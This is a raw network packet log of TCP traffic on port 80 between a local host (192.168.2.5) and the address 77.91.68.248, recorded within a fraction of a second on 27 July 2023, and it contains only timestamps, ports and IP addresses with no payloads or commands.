Jul 27, 2023 01:33:03.238154888 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238167048 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238190889 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238199949 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238214016 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238238096 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238241911 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238241911 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238266945 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238270044 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238300085 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238311052 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238312006 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238333941 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238351107 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238362074 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238394976 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238416910 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238430977 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238442898 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238442898 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238466024 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238476992 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238507032 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238533020 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238538027 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238568068 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238589048 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238589048 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238603115 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238637924 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238647938 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238670111 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238697052 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238715887 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238715887 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238718987 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238744020 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238749027 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238773108 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238782883 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238811016 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238821030 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238821030 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238843918 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238867998 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238873959 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238873959 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238890886 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238919973 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238945961 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238945961 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238951921 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.238982916 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.238986015 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239021063 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239039898 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239039898 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239051104 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239067078 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239073992 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239104033 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239114046 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239114046 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239136934 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239172935 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239175081 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239198923 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239216089 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239216089 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239223003 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239245892 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239284039 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239284039 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239360094 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239386082 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239408016 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239450932 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239450932 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239450932 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239483118 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239500999 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239512920 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239543915 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239554882 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239554882 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239577055 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239610910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239623070 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239623070 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239643097 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239667892 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239677906 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239712000 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239715099 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239746094 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239758015 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239758015 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239784956 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239798069 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239816904 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239850044 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239862919 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239881992 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239907980 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239907980 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239912033 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239944935 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.239963055 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239963055 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.239978075 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240009069 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240015030 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240015030 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240040064 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240072012 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240098953 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240122080 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240164042 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240165949 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240165949 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240196943 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240230083 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240243912 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240243912 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240272045 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240276098 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240318060 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240350962 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240362883 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240362883 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240381956 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240412951 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240412951 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240422964 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240456104 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240490913 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240493059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240493059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240524054 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240557909 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240559101 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240559101 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240590096 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240629911 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240632057 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240632057 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240663052 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240696907 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240696907 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240705967 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240739107 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240771055 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240777969 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240803957 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240835905 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240843058 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240843058 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240869045 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240901947 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240911961 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240911961 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240936041 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240969896 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.240978956 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.240978956 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241003990 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241039038 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241050005 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241084099 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241090059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241090059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241117001 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241151094 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241161108 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241161108 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241184950 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241216898 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241247892 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241254091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241254091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241281986 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241314888 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241319895 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241319895 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241345882 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241379976 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241386890 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241386890 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241410971 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241444111 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241462946 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241462946 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241477966 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241512060 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241517067 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241517067 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241542101 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241575956 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241584063 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241584063 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241605997 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241636038 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241648912 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241648912 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241664886 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241698027 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241702080 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241702080 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241730928 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241760969 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241765022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241765022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241791964 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241825104 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241833925 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241835117 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241858006 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241889954 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241899967 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241899967 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241921902 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241955996 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241990089 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.241991997 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.241991997 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242022991 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242029905 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242029905 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242054939 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242085934 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242101908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242121935 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242140055 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242155075 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242161036 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242187977 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242212057 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242222071 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242255926 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242259979 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242286921 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242295980 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242312908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242320061 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242343903 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242355108 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242386103 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242408991 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242408991 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242420912 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242455959 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242480040 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242480993 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242490053 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242525101 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242559910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242588997 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242588997 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242594004 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242626905 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242650986 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242659092 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242659092 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242674112 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242692947 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242697001 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242724895 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242744923 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242744923 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242757082 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242769957 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242789030 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242830992 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242855072 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242856979 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242856979 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242882967 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242888927 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242897034 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.242923021 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242957115 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.242990971 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243025064 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243061066 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243067980 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243093014 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243124008 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243125916 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243160963 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243175030 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243196964 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243200064 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243200064 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243227005 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243237019 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243268967 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243294954 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243294954 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243302107 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243321896 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243334055 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243359089 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243369102 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243369102 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243382931 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243407965 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243431091 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243451118 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243451118 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243455887 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243482113 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243510962 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243511915 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243544102 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243545055 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243545055 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243578911 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243590117 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243616104 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243628979 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243649006 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243684053 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243710995 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243712902 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243712902 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243732929 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243753910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243796110 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243819952 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243829966 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243865013 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243891001 CEST	80	49725	77.91.68.248	192.168.2.5
